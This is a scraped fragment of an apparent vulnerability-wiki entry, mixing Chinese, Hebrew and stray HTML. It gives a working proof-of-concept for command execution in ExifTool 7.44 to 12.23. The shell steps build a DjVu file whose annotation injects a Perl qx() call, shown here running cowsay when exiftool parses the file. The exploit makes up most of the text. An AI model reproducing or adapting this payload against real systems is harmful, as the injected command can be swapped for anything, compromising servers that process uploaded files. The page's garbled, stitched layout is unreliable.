免费、自由、人人可编辑的漏洞库--PwnWiki.com
,
גרסה מושפעת
ExifTool 7.44 to 12.23
POC
$ printf 'P1 1 1 0' > moo.pbm $ cjb2 moo.pbm moo.djvu $ printf 'ANTa\0\0\0\40"(xmp(\\\n".qx(cowsay pwned>&2);#"' >> moo.djvu $ exiftool moo.djvu > /dev/null _______ < pwned > ------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | " title="齐治堡垒机前台远程命令执行漏洞/zh-hans" rel="bookmark">齐治堡垒机前台远程命令执行漏洞/zh-hans